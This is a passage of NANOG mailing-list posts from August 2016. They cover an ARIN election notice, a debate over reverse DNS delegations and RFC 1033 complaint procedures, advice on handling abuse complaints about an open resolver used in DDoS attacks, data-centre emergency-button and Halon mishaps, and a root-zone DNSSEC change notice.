Each ARIN member organization may cast one ballot in the ARIN elections and voting is done by their Voting Contact on record. New this year, all Voting Contacts must be linked to an ARIN Online account in order to cast their ballot. 6 September is the deadline to have that account linked and otherwise ensure that your organization is eligible to vote.
Information is available at: https://www.arin.net/about_us/membership/votingcontacts.html or please reach out to members at arin.net today with questions or requests for assistance.

Thanks for your time and interest in the governance of ARIN!

/John

John Curran
President and CEO
American Registry for Internet Numbers (ARIN)

From cma at cmadams.net Mon Aug 29 23:47:37 2016
From: cma at cmadams.net (Chris Adams)
Date: Mon, 29 Aug 2016 18:47:37 -0500
Subject: Cloudflare reverse DNS SERVFAIL, normal?
In-Reply-To: <20160829212843.53C1252BB76F@rock.dv.isc.org>
References: <20160829212843.53C1252BB76F@rock.dv.isc.org>
Message-ID: <20160829234737.GA16137@cmadams.net>

Once upon a time, Mark Andrews said:
> The following is general and is not directed at Cloudflare. I know
> some people don't think errors in the reverse DNS are not critical
> but if you are delegated a zone it is your responsibility to ensure
> your servers are correctly serving that zone regardless of where
> it is in the DNS hierarchy. Failure to do that causes additional
> work for recursive servers. If you don't want to serve a zone then
> remove the delegation.

You are assuming that an authoritative server operator has some way to know all the zones people delegate to their servers, and remove such delegations if they don't want to handle them. That is a wrong assumption.

--
Chris Adams

From opendak at shaw.ca Mon Aug 29 23:54:53 2016
From: opendak at shaw.ca (David)
Date: Mon, 29 Aug 2016 17:54:53 -0600
Subject: Cloudflare reverse DNS SERVFAIL, normal?
In-Reply-To: <20160829234737.GA16137@cmadams.net>
References: <20160829212843.53C1252BB76F@rock.dv.isc.org> <20160829234737.GA16137@cmadams.net>
Message-ID: <0e8b8828-d171-8e0a-1f38-810abc37be28@shaw.ca>

On 2016-08-29 5:47 PM, Chris Adams wrote:
> Once upon a time, Mark Andrews said:
>> The following is general and is not directed at Cloudflare.
>> I know
>> some people don't think errors in the reverse DNS are not critical
>> but if you are delegated a zone it is your responsibility to ensure
>> your servers are correctly serving that zone regardless of where
>> it is in the DNS hierarchy. Failure to do that causes additional
>> work for recursive servers. If you don't want to serve a zone then
>> remove the delegation.
>
> You are assuming that an authoritative server operator has some way to
> know all the zones people delegate to their servers, and remove such
> delegations if they don't want to handle them. That is a wrong
> assumption.
>

Even more generally is that your authoritative server should respond to anything it is asked with an appropriate answer. Dropping/filtering can lead to bad situations.

From marka at isc.org Tue Aug 30 00:01:41 2016
From: marka at isc.org (Mark Andrews)
Date: Tue, 30 Aug 2016 10:01:41 +1000
Subject: Cloudflare reverse DNS SERVFAIL, normal?
In-Reply-To: Your message of "Mon, 29 Aug 2016 18:47:37 -0500." <20160829234737.GA16137@cmadams.net>
References: <20160829212843.53C1252BB76F@rock.dv.isc.org> <20160829234737.GA16137@cmadams.net>
Message-ID: <20160830000141.56CE952C6CF0@rock.dv.isc.org>

In message <20160829234737.GA16137 at cmadams.net>, Chris Adams writes:
> Once upon a time, Mark Andrews said:
> > The following is general and is not directed at Cloudflare. I know
> > some people don't think errors in the reverse DNS are not critical
> > but if you are delegated a zone it is your responsibility to ensure
> > your servers are correctly serving that zone regardless of where
> > it is in the DNS hierarchy. Failure to do that causes additional
> > work for recursive servers. If you don't want to serve a zone then
> > remove the delegation.
>
> You are assuming that an authoritative server operator has some way to
> know all the zones people delegate to their servers, and remove such
> delegations if they don't want to handle them. That is a wrong
> assumption.
They have methods. They choose not to use them. See RFC 1033 COMPLAINTS then after that the court system.

Mark

> --
> Chris Adams
--
Mark Andrews, ISC
1 Seymour St., Dundas Valley, NSW 2117, Australia
PHONE: +61 2 9871 4742 INTERNET: marka at isc.org

From marka at isc.org Tue Aug 30 00:31:32 2016
From: marka at isc.org (Mark Andrews)
Date: Tue, 30 Aug 2016 10:31:32 +1000
Subject: Handling of Abuse Complaints
In-Reply-To: Your message of "Mon, 29 Aug 2016 12:00:49 -0700." <3dc3fd61-5123-0070-dd4e-435ce6785577@satchell.net>
References: <3dc3fd61-5123-0070-dd4e-435ce6785577@satchell.net>
Message-ID: <20160830003132.C65A252C766A@rock.dv.isc.org>

In message <3dc3fd61-5123-0070-dd4e-435ce6785577 at satchell.net>, Stephen Satchell writes:
> On 08/29/2016 08:55 AM, Jason Lee wrote:
> > NANOG Community,
> >
> > I was curious how various players in this industry handle abuse complaints.
> > I'm drafting a policy for the service provider I'm working for about
> > handling of complaints registered against customer IP space. In this example
> > I have a customer who is running an open resolver and have received a few
> > complaints now regarding it being used as part of a DDoS attack.
> >
> > My initial response was to inform the customer and ask them to fix it. Now
> > that it's still ongoing over a month later, I'd like to take action to
> > remediate the issue myself with ACLs but our customer facing team is
> > pushing back and without an idea of what the industry best practice is,
> > management isn't sure which way to go.
> >
> > I'm hoping to get an idea of how others handle these cases so I can develop
> > our formal policy on this and have management sign off and be able to take
> > quicker action in the future.
>
> It depends on the nature of the complaint. If it's an amplification
> attack of some kind, figure out how the perp is doing it, and block it
> as appropriate.
> For example, do you filter incoming packets with source
> address of subnet network and broadcast (shorter than /30) and allnet
> (255.255.255.255) broadcast, and filter packets outbound with
> destinations of allnet broadcast?
>
> DNS and NTP can be tricked into generating packet storms. In
> particular, you may want to block excessive large DNS requests inbound
> using deep packet inspection at your edge.
>
> Not all abuse problems are the fault of the customer. You have to do
> your part as well.

I presume every one of you is planning to install DNS servers that support RFC 7873 - DNS COOKIES? Yes, servers exist that support this and some TLD's are already using such servers (0.47%), Alexa .Gov and .AU servers (0.09%), Alexa Top 1000 (0.22%) and Alexa Bottom 1000 (.19%).

Mark
--
Mark Andrews, ISC
1 Seymour St., Dundas Valley, NSW 2117, Australia
PHONE: +61 2 9871 4742 INTERNET: marka at isc.org

From larrysheldon at cox.net Tue Aug 30 01:09:26 2016
From: larrysheldon at cox.net (Larry Sheldon)
Date: Mon, 29 Aug 2016 20:09:26 -0500
Subject: Handling of Abuse Complaints
In-Reply-To:
References: <44A68DD2-40FC-470E-9FB2-29D10585886D@mykolab.com>
Message-ID: <7c042cb6-5d11-ca97-217f-ed9a84ad2815@cox.net>

On 8/29/2016 11:47, Steve Atkins wrote:
> Unless your abuse / security desk is staffed by lawyers it's probably
> better to avoid words like "criminal" and "unlawfully" altogether and
> stick to "in violation of our ToS".

Or "in violation of your contract (which includes, by reference, our TOS) with us."

--
"Everybody is a genius. But if you judge a fish by its ability to climb a tree, it will live its whole life believing that it is stupid."
--Albert Einstein

From Larry's Cox account.

From aaron at heyaaron.com Tue Aug 30 05:31:27 2016
From: aaron at heyaaron.com (Aaron C. de Bruyn)
Date: Mon, 29 Aug 2016 22:31:27 -0700
Subject: Don't press the big red buttom on the wall!
In-Reply-To:
References:
Message-ID:

"“Unfortunately because it was human error we weren’t prepared for it,” Holmes said."

I'm glad to know they are prepared for errors by deities and squirrels.

-A

On Mon, Aug 29, 2016 at 4:02 PM, Alan Buxey wrote:

> >“Unfortunately because it was human >error we weren’t prepared for it,”
> >Holmes said.
>
> "But it's elementary!" Watson retorted
>
> :)
>
> alan
>

From askoorb+nanog at gmail.com Tue Aug 30 08:32:25 2016
From: askoorb+nanog at gmail.com (Alex Brooks)
Date: Tue, 30 Aug 2016 09:32:25 +0100
Subject: Handling of Abuse Complaints
In-Reply-To:
References:
Message-ID:

Hi,

On 29 August 2016 at 16:55, Jason Lee wrote:
> NANOG Community,
>
> I was curious how various players in this industry handle abuse complaints.
> I'm drafting a policy for the service provider I'm working for about
> handling of complaints registered against customer IP space. In this example
> I have a customer who is running an open resolver and have received a few
> complaints now regarding it being used as part of a DDoS attack.
>
> My initial response was to inform the customer and ask them to fix it. Now
> that it's still ongoing over a month later, I'd like to take action to
> remediate the issue myself with ACLs but our customer facing team is
> pushing back and without an idea of what the industry best practice is,
> management isn't sure which way to go.
>
> I'm hoping to get an idea of how others handle these cases so I can develop
> our formal policy on this and have management sign off and be able to take
> quicker action in the future.
>

As you are developing a policy and procedure, you might want to have a look at the resources provided (free) by the Messaging, Malware and Mobile Anti-Abuse Working Group (M3AAWG). Whilst not answering your question directly, it can be useful to have some general abuse best practice documents around when developing your own policies.
Lots of resources are available at https://www.m3aawg.org/for-the-industry, including:

- Best Common Practices for Hosting and Cloud Service Providers
- Best Practices to Address Online, Mobile, and Telephony Threats
- Feedback Reporting Recommendation
- Overview of DNS Security - Port 53 Protection
- Abuse Desk Common Practices
- The Anti-Bot Code of Conduct for Internet Service Providers

There's a lot of stuff about email and email spam (including a whole page on FBLs at https://www.m3aawg.org/fbl-resources), but there is some stuff there on abuse in other domains as well. It's well worth a gander.

HTH,

Alex

From dimith50 at outlook.com Tue Aug 30 12:12:38 2016
From: dimith50 at outlook.com (Hristo Dimitrov)
Date: Tue, 30 Aug 2016 14:12:38 +0200
Subject: Looking for Spamhaus contact
In-Reply-To:
References:
Message-ID:

Hello,

It has been pointed out to me that the PBL Contact information is located in the "Help (Guide)" menu item in the PBL Account. This opens a new page and the contact email is right at the bottom of the page. Not sure how I missed it.

Thanks to all of you who contacted me offline.

> From: dimith50 at outlook.com
> To: nanog at nanog.org
> Subject: Looking for Spamhaus contact
> Date: Mon, 29 Aug 2016 16:35:45 +0200
>
> Hi,
>
>
> Could somebody from Spamhaus contact me offlist?
>
> I've run in the case "[CIDR] conflicts with other PBL master records" where the whole range previously seems to have belonged to another ISP who has returned the range to RIPE. However they still have it listed in a PBL and it is not possible to contact them.
>
> As per Spamhaus FAQ "...contact Spamhaus directly to obtain control of those Master Ranges. There is a contact address in your PBL Account."
>
>
> The issue is that I do not see a Spamhaus contact address in our PBL account. And there doesn't seem to be any other conventional way to contact Spamhaus...
>
>
>
>
> Best regards,
> Hristo D.
>
>
>

From math at sizone.org Tue Aug 30 14:21:11 2016
From: math at sizone.org (Ken Chase)
Date: Tue, 30 Aug 2016 10:21:11 -0400
Subject: Don't press the big red buttom on the wall!
In-Reply-To:
References:
Message-ID: <20160830142110.GA792@sizone.org>

3 of my internet-lifetimes/startups ago, we had this happen when one of the L2 techs was doing their 'rounds' - but had a backpack on. They swung around and hit the safety cover on the BRS - which got knocked off. They freaked out a bit while putting the cover back on... and managed to activate it. Dead silence followed: "Whoa! What wasn't that?!"

(A good story anyway. It wasn't clear from video exactly what happened. More entertaining in review when sped up and backed with Yakety Sax.)

Hilarity ensued. Customers irated. Procedures were modified. SLAs were paid. Nicknames were coined.

Could also be that it was a bit too red and shiny:

https://www.youtube.com/watch?v=NITBfc1EOBo#t=27s

/kc

On Mon, Aug 29, 2016 at 10:31:27PM -0700, Aaron C. de Bruyn said:
>"“Unfortunately because it was human error we weren’t prepared for it,”
>Holmes said."
>
>I'm glad to know they are prepared for errors by deities and squirrels.
>
>-A
>
>On Mon, Aug 29, 2016 at 4:02 PM, Alan Buxey wrote:
>
>> >“Unfortunately because it was human >error we weren’t prepared for it,”
>> >Holmes said.
>>
>> "But it's elementary!" Watson retorted
>>
>> :)
>>
>> alan
>>

--
Ken Chase - Toronto Canada

From keiths at neilltech.com Tue Aug 30 14:40:42 2016
From: keiths at neilltech.com (Keith Stokes)
Date: Tue, 30 Aug 2016 14:40:42 +0000
Subject: Don't press the big red buttom on the wall!
In-Reply-To: <20160830142110.GA792@sizone.org>
References: <20160830142110.GA792@sizone.org>
Message-ID:

At one point in one data center I dealt with a disgruntled employee hit the UPS disconnect button on the way out.

Same story, procedures modified, cover put over switch with a hammer to break the glass, lessons learned, accounts credited.
On Aug 30, 2016, at 9:21 AM, Ken Chase > wrote: 3 of my internet-lifetimes/startups ago, we had this happen when one of the L2 techs was doing their 'rounds' - but had a backpack on. They swung around and hit the safety cover on the BRS - which got knocked off. They freaked out a bit while putting the cover back on... and managed to activate it. Dead silence followed: "Whoa! What wasn't that?!" (A good story anyway. It wasnt clear from video exactly what happened. More entertaining in review when sped up and backed with Yakety Sax.) Hilarity ensued. Customers irated. Procedures were modified. SLAs were paid. Nicknames were coined. Could also be that it was a bit too red and shiny: https://www.youtube.com/watch?v=NITBfc1EOBo#t=27s /kc On Mon, Aug 29, 2016 at 10:31:27PM -0700, Aaron C. de Bruyn said: "???Unfortunately because it was human error we weren???t prepared for it,??? Holmes said." I'm glad to know they are prepared for errors by deities and squirrels. -A On Mon, Aug 29, 2016 at 4:02 PM, Alan Buxey > wrote: ???Unfortunately because it was human >error we weren???t prepared for it,??? Holmes said. "But it's elementary!" Watson retorted :) alan -- Ken Chase - Toronto Canada --- Keith Stokes From A.L.M.Buxey at lboro.ac.uk Tue Aug 30 14:43:13 2016 From: A.L.M.Buxey at lboro.ac.uk (A.L.M.Buxey at lboro.ac.uk) Date: Tue, 30 Aug 2016 14:43:13 +0000 Subject: Don't press the big red buttom on the wall! In-Reply-To: <20160830142110.GA792@sizone.org> References: <20160830142110.GA792@sizone.org> Message-ID: <20160830144313.GB15140@lboro.ac.uk> Hi, > https://www.youtube.com/watch?v=NITBfc1EOBo#t=27s "This video contains content from B_Viacom, who has blocked it in your country on copyright grounds." I love YouTube and copyright regional laws :/ alan From A.L.M.Buxey at lboro.ac.uk Tue Aug 30 14:45:09 2016 From: A.L.M.Buxey at lboro.ac.uk (A.L.M.Buxey at lboro.ac.uk) Date: Tue, 30 Aug 2016 14:45:09 +0000 Subject: Don't press the big red buttom on the wall! 
In-Reply-To: <20160830142110.GA792@sizone.org> References: <20160830142110.GA792@sizone.org> Message-ID: <20160830144509.GC15140@lboro.ac.uk> Hi, whilst we're posting YouTube clips..... maybe they'd have been better off keeping a copy of the Internet https://www.youtube.com/watch?v=iDbyYGrswtg ;-) alan From math at sizone.org Tue Aug 30 14:56:37 2016 From: math at sizone.org (Ken Chase) Date: Tue, 30 Aug 2016 10:56:37 -0400 Subject: Don't press the big red buttom on the wall! In-Reply-To: <20160830144313.GB15140@lboro.ac.uk> References: <20160830142110.GA792@sizone.org> <20160830144313.GB15140@lboro.ac.uk> Message-ID: <20160830145637.GE792@sizone.org> Wow, since Im in Canada *WE* are the ones who usually don't get to watch anything, and no $vendor has gone and made it available in any way to legally purchase here either. (See stories of proxies being blocked to Netflix US from Canada - to get the tastier US content unavailable to us - and piracy spiking back up here.) oh internet, you great equalizer. this might work: https://vimeo.com/126720159 otherwise we're off to indian and russian websites, de jure. /kc On Tue, Aug 30, 2016 at 02:43:13PM +0000, A.L.M.Buxey at lboro.ac.uk said: >Hi, > >> https://www.youtube.com/watch?v=NITBfc1EOBo#t=27s > >"This video contains content from B_Viacom, who has blocked it in your country on copyright grounds." > >I love YouTube and copyright regional laws :/ > >alan -- Ken Chase - math at sizone.org Toronto Canada From bzs at theworld.com Tue Aug 30 20:46:57 2016 From: bzs at theworld.com (bzs at theworld.com) Date: Tue, 30 Aug 2016 16:46:57 -0400 Subject: Don't press the big red buttom on the wall! In-Reply-To: <20160830142110.GA792@sizone.org> References: <20160830142110.GA792@sizone.org> Message-ID: <22469.61633.450785.508783@gargle.gargle.HOWL> About the worst that ever happened to me was a security guy's walkie-talkie setting off an instant Halon drop. Cost about $10,000 to refill and was fairly exciting for those present. 
That also cut the machine room's power. At least it didn't set off the sprinkler system. We sat down with the Halon system vendor to find out why that happened after proving, on a by-passed system, that yes indeed one of these common walkie-talkies sets the thing off. File under: More Things To Worry About! -- -Barry Shein Software Tool & Die | bzs at TheWorld.com | http://www.TheWorld.com Purveyors to the Trade | Voice: +1 617-STD-WRLD | 800-THE-WRLD The World: Since 1989 | A Public Information Utility | *oo* From dwessels at verisign.com Tue Aug 30 21:32:53 2016 From: dwessels at verisign.com (Wessels, Duane) Date: Tue, 30 Aug 2016 21:32:53 +0000 Subject: Root and ARPA DNSSEC operational message -- signature validity period Message-ID: <5F1C5102-CC30-4CAF-9C2D-61AFDF6EC2C7@verisign.com> DNSSEC signatures in the Root and ARPA zones are currently given a validity period of 10 days. The validity period is being increased to 13 days, per the recommendations of RSSAC's Report on Root Zone TTLs [1] (aka RSSAC003). Note that we are not aware of any cases where the 10-day signature validity period has caused problems for DNSSEC validators. This is a precautionary measure designed to accommodate a worst-case scenario. This change will be implemented on September 6, 2016. Please feel free to contact us at RZM at verisign.com with concerns or questions, and to forward this notice to others who may not have already received it. [1] https://www.icann.org/en/system/files/files/rssac-003-root-zone-ttls-21aug15-en.pdf DW From owen at delong.com Tue Aug 30 21:39:10 2016 From: owen at delong.com (Owen DeLong) Date: Tue, 30 Aug 2016 14:39:10 -0700 Subject: Cloudflare reverse DNS SERVFAIL, normal? 
In-Reply-To: <20160830000141.56CE952C6CF0@rock.dv.isc.org> References: <20160829212843.53C1252BB76F@rock.dv.isc.org> <20160829234737.GA16137@cmadams.net> <20160830000141.56CE952C6CF0@rock.dv.isc.org> Message-ID: <926F8B85-8864-4424-BEAA-1836B718A9FD@delong.com> > On Aug 29, 2016, at 17:01 , Mark Andrews wrote: > > > In message <20160829234737.GA16137 at cmadams.net>, Chris Adams writes: >> Once upon a time, Mark Andrews said: >>> The following is general and is not directed at Cloudflare. I know >>> some people don't think errors in the reverse DNS are not critical >>> but if you are delegated a zone it is your responsibility to ensure >>> your servers are correctly serving that zone regardless of where >>> it is in the DNS hierarchy. Failure to do that causes additional >>> work for recursive servers. If you don't want to serve a zone then >>> remove the delegation. >> >> You are assuming that an authoritative server operator has some way to >> know all the zones people delegate to their servers, and remove such >> delegations if they don't want to handle them. That is a wrong >> assumption. > > They have methods. They choose not to use them. See RFC 1033 > COMPLAINTS then after that the court system. > > Mark Let us review this and compare to your statement… From RFC 1033: > COMPLAINTS > > These are the suggested steps you should take if you are having > problems that you believe are caused by someone else's name server: > > > 1. Complain privately to the responsible person for the domain. You > can find their mailing address in the SOA record for the domain. > > 2. Complain publicly to the responsible person for the domain. > > 3. Ask the NIC for the administrative person responsible for the > domain. Complain. You can also find domain contacts on the NIC in > the file NETINFO:DOMAIN-CONTACTS.TXT > > 4. Complain to the parent domain authorities. > > 5. Ask the parent authorities to excommunicate the domain. 1. 
Doesn’t really apply in a situation where someone has pointed an NS record for a domain at your server without warning. There is no SOA record from which to retrieve said mailing address. Also doesn’t work very well in cases where the SOA record does not contain a valid email address that reaches someone. 2. Do we really want NANOG buried in “Will the @#@!@$!@$% who delegated XYZ.COM NS Records to point to my servers and please cease and desist?” messages? Personally, I vote no. 3. The NIC? Please explicate Mr. Andrews what that would mean in the modern era. Please cover both the normal case and the cases where domain privacy is configured. 4. This might _MIGHT_ actually work, but I suspect that $REGISTRY is unlikely to help much when $REGISTRAR accepted an NS record from one of their customers for a domain they registered that happens to point to your server. Similarly, I suspect $REGISTRAR is going to tell you that they won’t make changes without authorization from the domain owner. 5. I suspect that success in this effort will likely parallel the level of success I would expect in step 4. So, now that we’ve realized that RFC-1033 is utterly useless in this context and badly outdated to boot, let’s review your other suggestion… “… after that [sic] the court system.” [sic] refers to the missing comma. So let me see if I understand correctly. I run a pair of nameservers. Let’s call them ns1.company.com and ns2.company.com Someone registers example.com and points NS records in the COM zone at my nameservers. I’m now supposed to seek judicial relief in order to compel them to stop doing that? Small claims doesn’t process claims seeking injunctive relief. I suppose I could use a $1,500 or even $5,000 small claims case as a way to get their attention, but that’s kind of an abuse of the process. If I want an injunction, at least in California, I have to go to Superior court. Now, first, we have to figure out jurisdiction. 
As a general rule, jurisdiction goes to the court which is responsible for the locale in which the event takes place or where the contract was entered into, or the jurisdiction set by the contract. In this case, there’s no contract, so we have to look at where the event in question occurred. The problem is that the law hasn’t really caught up with technology in this area and depending on who ends up being parties to the suit, the definition gets pretty murky at best. Is it the primary office of the registry? The registrar? The registrant? The location of the nameserver(s) which are erroneously pointed to? (What if they are anycast all over the world?) The business address of the operator or owner of those nameservers? Where, exactly do we file this suit? The next problem we have is who to sue. Do we sue the domain registrant? The registrar they used to register the domain name? etc. Yeah, I don’t think there’s enough possibility of any sort of recovery to make that worth the effort or expense. Owen From marka at isc.org Tue Aug 30 22:02:47 2016 From: marka at isc.org (Mark Andrews) Date: Wed, 31 Aug 2016 08:02:47 +1000 Subject: Cloudflare reverse DNS SERVFAIL, normal? In-Reply-To: Your message of "Tue, 30 Aug 2016 14:39:10 -0700." <926F8B85-8864-4424-BEAA-1836B718A9FD@delong.com> References: <20160829212843.53C1252BB76F@rock.dv.isc.org> <20160829234737.GA16137@cmadams.net> <20160830000141.56CE952C6CF0@rock.dv.isc.org> <926F8B85-8864-4424-BEAA-1836B718A9FD@delong.com> Message-ID: <20160830220247.B429652F1A39@rock.dv.isc.org> In message <926F8B85-8864-4424-BEAA-1836B718A9FD at delong.com>, Owen DeLong writes: > > On Aug 29, 2016, at 17:01 , Mark Andrews wrote: > > > > > > In message <20160829234737.GA16137 at cmadams.net>, Chris Adams writes: > >> Once upon a time, Mark Andrews said: > >>> The following is general and is not directed at Cloudflare. 
I know > >>> some people don't think errors in the reverse DNS are not critical > >>> but if you are delegated a zone it is your responsibility to ensure > >>> your servers are correctly serving that zone regardless of where > >>> it is in the DNS hierarchy. Failure to do that causes additional > >>> work for recursive servers. If you don't want to serve a zone then > >>> remove the delegation. > >> > >> You are assuming that an authoritative server operator has some way to > >> know all the zones people delegate to their servers, and remove such > >> delegations if they don't want to handle them. That is a wrong > >> assumption. > > > > They have methods. They choose not to use them. See RFC 1033 > > COMPLAINTS then after that the court system. > > > > Mark > > Let us review this and compare to your statement… > > From RFC 1033: > > COMPLAINTS > > > > These are the suggested steps you should take if you are having > > problems that you believe are caused by someone else's name server: > > > > > > 1. Complain privately to the responsible person for the domain. You > > can find their mailing address in the SOA record for the domain. > > > > 2. Complain publicly to the responsible person for the domain. > > > > 3. Ask the NIC for the administrative person responsible for the > > domain. Complain. You can also find domain contacts on the NIC in > > the file NETINFO:DOMAIN-CONTACTS.TXT > > > > 4. Complain to the parent domain authorities. > > > > 5. Ask the parent authorities to excommunicate the domain. > > 1. Doesn’t really apply in a situation where someone has pointed > an NS record for a domain at your server without warning. There > is no SOA record from which to retrieve said mailing address. If they have pointed a NS record at you there is a SOA record. Either in the zone or in the delegating zone. > Also doesn’t work very well in cases where the SOA record does > not contain a valid email address that reaches someone. Some do, some don't. 
There is also whois address, web contact addresses etc. > 2. Do we really want NANOG buried in “Will the > @#@!@$!@$% who delegated XYZ.COM NS Records to > point to > my servers and please cease and desist?” > messages? Personally, I vote no. Why not. It is a operational message about a misconfiguration. > 3. The NIC? Please explicate Mr. Andrews what that would mean > in the modern era. Please cover both the normal case and > the cases where domain privacy is configured. > > 4. This might _MIGHT_ actually work, but I suspect that $REGISTRY > is unlikely to help much when $REGISTRAR accepted an NS record > from one of their customers for a domain they registered > that happens to point to your server. Similarly, I suspect > $REGISTRAR is going to tell you that they won’t make changes > without authorization from the domain owner. The registrar becomes party to the disruption to your services and no the contract the registry signed with ICANN does not save them from being fined by a court further down the process so they should listen as it is their financial interests to listen. Criminal law trumps contract law and deliberate disruption to services falls under criminal law. It becomes deliberate once they fail to act on the complaint in a timely manner. Remember we are dealing with matters of fact here. Published NS records and address records. Add to that there are published procedures that are not being followed that they should be aware of. > 5. I suspect that success in this effort will likely parallel > the level of success I would expect in step 4. > > So, now that we’ve realized that RFC-1033 is utterly useless in this > context and badly outdated to boot, let’s review your other suggestion… No, it isn't utterly useless. It also shows you have tried to solve the problem in a civil manner if you take it further. > “… after that [sic] the court system.” > > [sic] refers to the missing comma. > > So let me see if I understand correctly. 
> > I run a pair of nameservers. Let’s call them ns1.company.com > and ns2.company.com > > Someone registers example.com and points NS records > in the COM zone at my > nameservers. > > I’m now supposed to seek judicial relief in order to compel them to stop > doing that? > > Small claims doesn’t process claims seeking injunctive relief. I suppose > I could > use a $1,500 or even $5,000 small claims case as a way to get their > attention, > but that’s kind of an abuse of the process. If I want an injunction, at > least > in California, I have to go to Superior court. > > Now, first, we have to figure out jurisdiction. As a general rule, > jurisdiction > goes to the court which is responsible for the locale in which the event > takes > place or where the contract was entered into, or the jurisdiction set by > the > contract. In this case, there’s no contract, so we have to look at where > the > event in question occurred. The problem is that the law hasn’t really > caught > up with technology in this area and depending on who ends up being parties > to the suit, the definition gets pretty murky at best. Is it the primary > office of the registry? The registrar? The registrant? The location of the > nameserver(s) which are erroneously pointed to? (What if they are anycast > all over the world?) The business address of the operator or owner of > those > nameservers? Where, exactly do we file this suit? Your lawyer will work that out. > The next problem we have is who to sue. Do we sue the domain registrant? > The > registrar they used to register the domain name? etc. Your lawyer will work that out. > Yeah, I don’t think there’s enough possibility of any sort of recovery to > make that worth the effort or expense. So you decide to not avail yourself of the process available to you. That is not the same thing as saying there is no process. 
> Owen -- Mark Andrews, ISC 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: marka at isc.org From Valdis.Kletnieks at vt.edu Tue Aug 30 22:50:03 2016 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Tue, 30 Aug 2016 18:50:03 -0400 Subject: Cloudflare reverse DNS SERVFAIL, normal? In-Reply-To: <926F8B85-8864-4424-BEAA-1836B718A9FD@delong.com> References: <20160829212843.53C1252BB76F@rock.dv.isc.org> <20160829234737.GA16137@cmadams.net> <20160830000141.56CE952C6CF0@rock.dv.isc.org> <926F8B85-8864-4424-BEAA-1836B718A9FD@delong.com> Message-ID: <8738.1472597403@turing-police.cc.vt.edu> On Tue, 30 Aug 2016 14:39:10 -0700, Owen DeLong said: > I run a pair of nameservers. Let’s call them ns1.company.com > and ns2.company.com > Someone registers example.com and points NS records in the COM zone at my > nameservers. I would have expected that the resulting NXDOMAIN replies from ns1 and ns2 would usually make this a self-correcting problem. Are there actually people who do this misconfiguration on a zone big enough for the traffic to matter, and leave it that way for very long before they clue in that things aren't working right? I'd think that if somebody points billy-bobs-bait-tackle-and-internet.com at you, it might take you quite some time to notice - and if somebody whoopsies and points ebay.com's NS records at you, the resulting dysfunction would be noticed fairly soon.... (Miscreants who do this intentionally are, of course, a totally different kettle of fish, and need to be dealt with as miscreants....) From eric.kuhnke at gmail.com Tue Aug 30 23:25:08 2016 From: eric.kuhnke at gmail.com (Eric Kuhnke) Date: Tue, 30 Aug 2016 16:25:08 -0700 Subject: Don't press the big red buttom on the wall! 
In-Reply-To: References: Message-ID: If public transit operators can put a breakable plexiglass shield over the emergency door opening handle, on every bus, it's not a very high technical barrier. On Mon, Aug 29, 2016 at 2:51 PM, Sean Donelan wrote: > > See that big red button on the wall under the sign "Do Not Push This > Button!".... > > > DC 911 outage caused by contractor error > http://wtop.com/dc/2016/08/dc-911-outage-caused-by-contracto > r-who-pulled-wrong-switch/ > > WASHINGTON - D.C. is now operating two separate 911 centers after a power > outage caused by human error left the nation’s capital without any > emergency phone service for almost an hour on a busy weekend night. > > A contractor working Saturday night inadvertently pulled an emergency > power shut off switch that cut electricity to the 911 phone system and a > call routing system at the District’s Unified Communications Center, said > the center’s Director Karima Holmes. > > “Unfortunately because it was human error we weren’t prepared for it,” > Holmes said. > > [...] > > > From eric.kuhnke at gmail.com Tue Aug 30 23:26:40 2016 From: eric.kuhnke at gmail.com (Eric Kuhnke) Date: Tue, 30 Aug 2016 16:26:40 -0700 Subject: Don't press the big red buttom on the wall! In-Reply-To: <22469.61633.450785.508783@gargle.gargle.HOWL> References: <20160830142110.GA792@sizone.org> <22469.61633.450785.508783@gargle.gargle.HOWL> Message-ID: Does this mean you could drive around with a (illegal, but not difficult to build or obtain) 20W wide band VHF/UHF jammer radio fed into a 1 meter parabolic dish, aim it at random buildings and set off peoples' halon systems? Wow. On Tue, Aug 30, 2016 at 1:46 PM, wrote: > > About the worst that ever happened to me was a security guy's > walkie-talkie setting off an instant Halon drop. Cost about $10,000 to > refill and was fairly exciting for those present. That also cut the > machine room's power. > > At least it didn't set off the sprinkler system. 
> > We sat down with the Halon system vendor to find out why that happened > after proving, on a by-passed system, that yes indeed one of these > common walkie-talkies sets the thing off. > > File under: More Things To Worry About! > > -- > -Barry Shein > > Software Tool & Die | bzs at TheWorld.com | > http://www.TheWorld.com > Purveyors to the Trade | Voice: +1 617-STD-WRLD | 800-THE-WRLD > The World: Since 1989 | A Public Information Utility | *oo* > From owen at delong.com Tue Aug 30 23:41:25 2016 From: owen at delong.com (Owen DeLong) Date: Tue, 30 Aug 2016 16:41:25 -0700 Subject: Cloudflare reverse DNS SERVFAIL, normal? In-Reply-To: <20160830220247.B429652F1A39@rock.dv.isc.org> References: <20160829212843.53C1252BB76F@rock.dv.isc.org> <20160829234737.GA16137@cmadams.net> <20160830000141.56CE952C6CF0@rock.dv.isc.org> <926F8B85-8864-4424-BEAA-1836B718A9FD@delong.com> <20160830220247.B429652F1A39@rock.dv.isc.org> Message-ID: <46671DC5-3138-4E7A-A5AF-631B98FE354A@delong.com> > On Aug 30, 2016, at 15:02 , Mark Andrews wrote: > > > In message <926F8B85-8864-4424-BEAA-1836B718A9FD at delong.com >, Owen DeLong writes: >>> On Aug 29, 2016, at 17:01 , Mark Andrews wrote: >>> >>> >>> In message <20160829234737.GA16137 at cmadams.net>, Chris Adams writes: >>>> Once upon a time, Mark Andrews said: >>>>> The following is general and is not directed at Cloudflare. I know >>>>> some people don't think errors in the reverse DNS are not critical >>>>> but if you are delegated a zone it is your responsablity to ensure >>>>> your servers are correctly serving that zone regardless of where >>>>> it is in the DNS heirarchy. Failure to do that causes additional >>>>> work for recursive servers. If you don't want to serve a zone then >>>>> remove the delegation. >>>> >>>> You are assuming that an authoritative server operator has some way to >>>> know all the zones people delegate to their servers, and remove such >>>> delegations if they don't want to handle them. 
